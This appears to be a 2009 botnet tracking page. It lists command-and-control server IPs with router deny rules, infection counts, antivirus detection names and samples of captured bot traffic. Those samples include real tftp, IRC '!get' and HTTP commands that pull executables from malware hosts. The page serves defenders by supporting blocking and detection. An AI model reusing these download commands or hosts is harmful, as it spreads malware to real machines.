Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Fri Nov 6 08:34:01 2009

10 Day Filter Set      30 Day Filter Set      

Priority 100 TCP Ports 80 80 218 80 114 80 91 Filter deny ip host 213.219.245.212 any log ! 464 infects 06/09/09 to 11/05/09 eastweb.ru ISP hosting and colocation services
Clients 464 russian federation Activity Domain eastweb.ru
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
  • Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Korgo.9359.B
AntiVirKorgo.X
AuthentiumKorgo.W
Avast_Korgo-T
AVGPadobot.W
BitDefenderKorgo.W
CAT-QuickHealKorgo.X
ClamAVKorgo.Y
DrWebLsabot
eSafePadobot.gen
eTrust-VetKorgo.AB
EwidoDropper.Paradrop.a
FileAdvisorMISSED
FortinetKorgo.K!worm
F-ProtKorgo.W
F-SecurePadobot.gen
IkarusKorgo.K
KasperskyPadobot.gen
McAfeeKorgo.ab
MicrosoftKorgo.AB
NOD32v2Korgo.Y
NormanKorgo.Y
PandaKorgo.AY.worm
Prevx1KORGO.W
RisingKorgo.x
SophosKorgo-K
SunbeltMISSED
SymantecKorgo.X
TheHackerKorgo(2).gen.pack
TrendMicroMISSED
VBA32Padobot.gen
VirusBusterKorgo.AB
Webwasher
Gateway
Korgo.X
Priority 100 TCP Ports 2081 9890 9890 66 2010 9890 216 Filter deny ip host 66.252.13.214 any log ! 252 infects 05/10/09 to 11/03/09 louisianadynamics.com ISP gigenet
Clients 252 united states Activity Domain louisianadynamics.com
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR Win15763.exe
  • Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
  • Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
  • Client: JOIN ##S## J
  • Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
  • Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirTRCrypt.TPM.Gen
AuthentiumHeuristic-210!Eldorado
AvastMISSED
AVGRBot.DN
BitDefenderMemScan_Backdoor.RBot.XYL
CAT-QuickHealBlack.a
ClamAVPacked-142
DrWebPacked.650
eSafeMISSED
eTrust-VetForBot.WP
EwidoMISSED
FileAdvisorMISSED
FortinetPacked.2D18!tr
F-ProtHeuristic-210!Eldorado
F-SecureKolab.arp
IkarusKolab
KasperskyKolab.arp
McAfeeMISSED
MicrosoftWootbot.gen
NOD32v2MISSED
NormanMalware.DQWL
PandaMISSED
Prevx1MISSED
RisingUndef.blt
SophosMalGeneric-A
SunbeltKolab.arp
SymantecSpybot.Worm
TheHackerBehav-Heuristic-064
TrendMicroBKDR_SDBOT.FOG
VBA32Wootbot
VirusBusterAgobot.WPUZ
Webwasher
Gateway
MISSED
Priority 72 TCP Ports 65520 65520 85 65520 218 65520 69 Filter deny ip host 221.5.74.39 any log ! 70 infects 06/25/09 to 08/17/09 cncnet.net ISP china unicom guangdong province network
Clients 70 china Activity Domain cncnet.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 114.207.40.33 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 114.207.40.33 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK pxlisrppUSER l020501 . . :-
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG pxlisrpp :!get...
  • Client: GET /EvID4226Patch.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /gc.exe HTTP/1.0User-Agent: DownloadHost: put.ghura.plPragma:...
  • Server: GET...
  • Server: GET...
  • Server: GET /gt_ky.php HTTP/1.0User-Agent: Windows 5.1 (2600); DMCP ver...
  • Server: GET /get_93.php?p=152 HTTP/1.0User-Agent: Windows 5.1 (2600);...
  • Server: GET...
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDownloader.Gen
AuthentiumDownloader.F.gen!Eldorado
AvastMISSED
AVGDownloader.Generic8.BFCH
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebDownLoader.origin
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtDownloader.F.gen!Eldorado
F-SecureSuspicious_Malware!Gemini
IkarusZlob
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanDLoader.KZPW
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 71 TCP Ports 65520 65520 216 65520 85 65520 221 Filter deny ip host 218.93.205.24 any log ! 69 infects 06/26/09 to 08/14/09 163data.com.cn ISP chinanet jiangsu province network
Clients 69 china Activity Domain 163data.com.cn
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 116.120.239.76 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 116.120.239.76 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK ioroihzmUSER b020501 . . :-
  • Server: NICK ioroihzmUSER b020501 . . :-JOIN &virtu
  • Server: :u. PRIVMSG ioroihzm :!get http:/www.zief.pl/gc.exe:u. PRIVMSG...
  • Client: GET /gc.exe HTTP/1.0User-Agent: DownloadHost: www.zief.plPragma:...
  • Server: GET...
  • Server: GET...
  • Server: GET /gt_ky.php HTTP/1.0User-Agent: Windows 5.1 (2600); DMCP ver...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: GET /get_93.php?p=155 HTTP/1.0User-Agent: Windows 5.1 (2600);...
  • Server: GET...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 65 TCP Ports 3305 Filter deny ip host 61.120.62.28 any log ! 63 infects 05/22/09 to 08/22/09 dion.ne.jp ISP rabby_s inc
Clients 63 japan Activity Domain dion.ne.jp
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 204.116.1.238 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 204.116.1.238 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|bn0tpy3sxUSER w1m95y9mp * 0 :USA|2K|378
  • Server: :hub.63631.net 001 P|bn0tpy3sx...
  • Client: USERHOST P|bn0tpy3sx
  • Client: USERHOST P|bn0tpy3sxMODE P|bn0tpy3sx JOIN #mm RSA
  • Server: :hub.63631.net 302 P|bn0tpy3sx...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumVirut.7116
Avast_Virtob
AVGVirut
BitDefenderVirtob.8.Gen
CAT-QuickHealVirut.Z
ClamAVVirut-17
DrWebVirut.30
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtVirut.7116
F-SecureVirut.av
IkarusKolabc
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanVirut.AG
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 62 TCP Ports 65520 65520 91 65520 213 Filter deny ip host 218.93.205.30 any log ! 60 infects 09/09/09 to 11/05/09 163data.com.cn ISP chinanet jiangsu province network
Clients 60 china Activity Domain 163data.com.cn
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 211.187.180.91 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 211.187.180.91 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK gulajgolUSER q020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: :i. PRIVMSG gulajgol :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /svc.php?file=isvchost.exe HTTP/1.0Accept: */*User-Agent:...
  • Server: GET /svc.php?file=svchost.exe HTTP/1.0Accept: */*User-Agent:...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: GET /svc.php?file=svchust.exe HTTP/1.0Accept: */*User-Agent:...
  • Server: GET...
  • Server: GET...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut
AntiVirVirut.A
AuthentiumVirut.4960
Avast_Nachi
AVGVirut.A
BitDefenderWelchia.A
CAT-QuickHealVirut.A
ClamAVVirut.A
DrWebVirut
eSafeVirut.a
eTrust-VetVirut.5127
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.A
F-ProtVirut.4960
F-SecureVirut.a
IkarusVirut.a
KasperskyVirut.a
McAfeeVirut.a
MicrosoftMISSED
NOD32v2Virut.5127
NormanVirut.A
PandaVirutas.B
Prevx1MISSED
RisingVirut.az
SophosVirut-T
SunbeltMISSED
SymantecVirut.A
TheHackerVirut.gen
TrendMicroPE_VIRUT.A
VBA32Virut.A
VirusBusterNachi
Webwasher
Gateway
Virut.A
Priority 48 TCP Ports 3305 Filter deny ip host 92.240.234.164 any log ! 47 infects 09/07/09 to 11/02/09 lightstorm.sk ISP lightstorm communications s.r.o
Clients 47 slovakia Activity Domain lightstorm.sk
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 211.20.222.150 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 211.20.222.150 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
  • Server: :hub.2702.net 001 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7b
  • Server: :hub.2702.net 302 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.AOLW
BitDefenderGeneric.Mydoom.F72197F1
CAT-QuickHealAgent.gen
ClamAVMISSED
DrWebHLLW.Piabot.origin
eSafeMISSED
eTrust-VetIRCBot.PJ
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolabc.gza
IkarusExploit.MS06040
KasperskyKolabc.gza
McAfeeSpybot.worm!l
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanAtraps.MQB
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalBehav-004
SunbeltMISSED
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroSPYBOT.BIM
VBA32MISSED
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 48 TCP Ports 65520 65520 218 Filter deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09 - ISP group vertical ltd
Clients 47 russian federation Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 116.126.26.100 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 116.126.26.100 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK xdsexzfyUSER k020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebDownLoad.47549
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 35 TCP Ports 65520 121 65520 69 Filter deny ip host 114.80.101.21 any log ! 34 infects 05/30/09 to 06/25/09 online.sh.cn ISP chinanet shanghai province network
Clients 34 china Activity Domain online.sh.cn
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
  • Client: NICK ricrsscdUSER d020501 . . :-
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG ricrsscd :!get http:/brenz.pl/ex/a.php
  • Server: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: brenz.plPragma:...
  • Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /stx9/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /dll/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: NICK tpiyrtkgUSER j020501 . . :-
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG tpiyrtkg :!get...
  • Server: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: brenz.plPragma:...
  • Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /dll/mr.txt HTTP/1.0Accept: */*If-Modified-Since: Thu, 18 Jun...
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: PONG :m.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGGeneric13.BEHA
BitDefenderBehavesLike_ExplorerHijack
CAT-QuickHealMISSED
ClamAVMISSED
DrWebInject.5822
eSafeTRCrypt.XPACK
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMalware
IkarusTrojan-Downloader.Obitel
KasperskyAgent2.kov
McAfeeMISSED
MicrosoftTrojanDownloader_Obitel.gen!C
NOD32v2MISSED
NormanMalware
PandaMISSED
Prevx1MISSED
RisingDL.Undef.euc
SophosMalGeneric-A
SunbeltMISSED
SymantecDownloader
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 32 TCP Ports 65520 65520 213 Filter deny ip host 121.12.116.142 any log ! 31 infects 05/13/09 to 06/25/09 163data.com.cn ISP chinanet guangdong province network
Clients 31 china Activity Domain 163data.com.cn
Chatter Example
  • Server: echo off&echo open 79.163.203.154 1023>>cmd.ftp&echo...
  • Client: USER anonymous
  • Client: PASS bin
  • Server: RETR 23902_upload.exe
  • Client: NICK ttcaruuwUSER e020501 . . :-
  • Client: JOIN &virtu
  • Server: :m. PRIVMSG ttcaruuw :!get http:/goasi.cn/ex/a.php
  • Server: :u. PRIVMSG ttcaruuw :!get...
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: NICK srupkfvhUSER n020501 . . :-
  • Client: JOIN &virtu
  • Server: :m. PRIVMSG srupkfvh :!get http:/goasi.cn/ex/a.php
  • Server: :u. PRIVMSG srupkfvh :!get...
  • Client: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: goasi.cnPragma:...
  • Server: GET /files/adx.gif HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /cw.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /dll/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET / HTTP/1.0Host: www.google.comUser-Agent: Mozilla/4.0...
  • Client: POST /achcheck.php HTTP/1.0Host: upr15may.comUser-Agent:...
  • Client: POST /ld/gen.php HTTP/1.0Host: upr15may.comUser-Agent:...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGGeneric13.BEHA
BitDefenderBehavesLike_ExplorerHijack
CAT-QuickHealMISSED
ClamAVMISSED
DrWebInject.5822
eSafeTRCrypt.XPACK
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMalware
IkarusTrojan-Downloader.Obitel
KasperskyAgent2.kov
McAfeeMISSED
MicrosoftTrojanDownloader_Obitel.gen!C
NOD32v2MISSED
NormanMalware
PandaMISSED
Prevx1MISSED
RisingDL.Undef.euc
SophosMalGeneric-A
SunbeltMISSED
SymantecDownloader
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 30 TCP Ports 16667 Filter deny ip host 66.252.13.212 any log ! 29 infects 05/22/09 to 11/03/09 louisianadynamics.com ISP gigenet
Clients 29 united states Activity Domain louisianadynamics.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR Tracker.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
  • Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
  • Client: USERHOST [USA]2K-SP2[00]6761
  • Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn\\'t resolve your...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Client: USERHOST [USA]2K-SP2[00]0046
  • Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumBackdoor2.DKQM
Avast_Virtob
AVGVirut
BitDefenderGeneric.127971
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebHLLW.MyBot
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtBackdoor2.DKQM
F-SecureVirut.av
IkarusVirTool.DelfInject
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanAgent.LSMS
PandaVirutas.FG
Prevx1MISSED
RisingMnless.akf
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 22 TCP Ports 7000 Filter deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09 keymachine.de ISP keyweb ag ip network
Clients 22 germany Activity Domain keymachine.de
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR coder.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
  • Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
  • Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
  • Server: PONG :DD5EF013
  • Client: JOIN ##nzm##
  • Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
  • Client: PRIVMSG ##nzm## :\\002n\\002z\\037m\\037 (root.p\\037l\\037g)...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Agent.20480.AJY
AntiVirTRDropper.Gen
AuthentiumMISSED
AvastMISSED
AVGDropper.Generic.AVFT
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebPoison.767
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusTrojan-Ransom
KasperskyTrojan-Ransom.SMSer.in
McAfeeMISSED
MicrosoftVirTool_Injector.gen!Y
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32Rbot.afvq
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 21 TCP Ports 8080 72 10324 10324 72 10324 83 Filter deny ip host 67.43.236.66 any log ! 21 infects 06/09/09 to 10/02/09 - ISP nader dara
Clients 21 lebanon Activity Domain -
Chatter Example
  • Client: USER 1
  • Client: PASS 1
  • Server: RETR Cilevb.com
  • Client: USER hfmgaw hfmgaw hfmgaw :cqzxfgrdrxjyjwhj
  • Client: NICK mrouBtig
  • Client: MODE mrouBtig +xi
  • Client: GET /gg2.exe HTTP/1.0Host: zone2tech.info
  • Server: GET /wsws.exe HTTP/1.0Host: zone2tech.info
  • Client: JOIN #las6 USERHOST mrouBtigMODE #m +smntu
  • Server: :mrouBtig!hfmgaw@192.168.1.144 JOIN :#las6:hub.58784.com 353...
  • Client: MODE #las6 +smntu
  • Server: :hub.58784.com 482 mrouBtig #las6 :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumVirut.7116
Avast_Virtob
AVGRBot.KB
BitDefenderBot.95191
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebIRC.Sdbot.2665
eSafeTRCrypt.nspm
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtVirut.7116
F-SecureNepoe.em
IkarusCrypt.NSPM
KasperskyMISSED
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanVirut.AG
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Nepoe.em
VirusBusterPoeBot.OB
Webwasher
Gateway
MISSED
Priority 18 TCP Ports 6669 Filter deny ip host 89.138.22.15 any log ! 18 infects 07/09/09 to 07/09/09 netvision.net.il ISP bb-hfa
Clients 18 israel Activity Domain netvision.net.il
Chatter Example
  • Client: NICK USA|XP|SP0|00|7724USER pvser 0 0 :\\002\\0034CodeD \\0038By...
  • Server: :fart.bitchassness.shit NOTICE USA|XP|SP0|00|7724 :*** If you are...
  • Server: PONG :9BB24218
  • Client: JOIN ##!X5 whores
  • Client: USERHOST USA|XP|SP0|00|7724
  • Client: MODE USA|XP|SP0|00|7724 -x+iJOIN ##!X5 whoresUSERHOST...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 17 TCP Ports 6900 Filter deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09 - ISP mostelecom-customer
Clients 17 russian federation Activity Domain -
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR utilmgr.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
  • Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
  • Server: PONG :4FE4D7D7
  • Client: JOIN ##!X4
  • Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGIRCBackDoor.SdBot4.NNI
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolab.eay
IkarusKolab
KasperskyKolab.eay
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroKOLAB.DW
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 15 TCP Ports 10324 Filter deny ip host 67.43.236.67 any log ! 15 infects 07/23/09 to 09/19/09 - ISP nader dara
Clients 15 lebanon Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 67.123.204.202 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 67.123.204.202 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER xeodwo xeodwo xeodwo :pkjzcuvgmdbgctxb
  • Client: NICK BWeBcttR
  • Client: MODE BWeBcttR +xi
  • Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
  • Client: JOIN #last USERHOST BWeBcttRMODE #m +smntuPRIVMSG #m...
  • Client: MODE #last +smntu
  • Server: :hub.20582.com 482 BWeBcttR #last :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirRbot.cyj
AuthentiumBackdoor2.EVZY
AvastMISSED
AVGGeneric11.ABKQ
BitDefenderIRCBot.ACTA
CAT-QuickHealVanBot.bdt
ClamAVMISSED
DrWebMISSED
eSafeIRCBot
eTrust-VetSlenfbot!generic
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtBackdoor2.EVZY
F-SecureVanBot.bdt
IkarusVanBot
KasperskyVanBot.bdt
McAfeeNirbot.worm!a
MicrosoftVirTool_DelfInject.gen!AW
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingDelf.efj
SophosMalGeneric-A
SunbeltMISSED
SymantecIRCBot
TheHackerMISSED
TrendMicroBKDR_VANBOT.RG
VBA32Autorun.xdfc
VirusBusterVanBot.BBW
Webwasher
Gateway
MISSED
Priority 13 TCP Ports 6669 Filter deny ip host 190.12.5.5 any log ! 13 infects 07/11/09 to 07/12/09 corp-190-12-4-10-cue.puntonet.ec ISP puntonet s.a
Clients 13 ecuador Activity Domain corp-190-12-4-10-cue.puntonet.ec
Chatter Example
  • Client: NICK USA|2K|SP2|00|2905USER hohri 0 0 :\\002\\0034CodeD \\0038By...
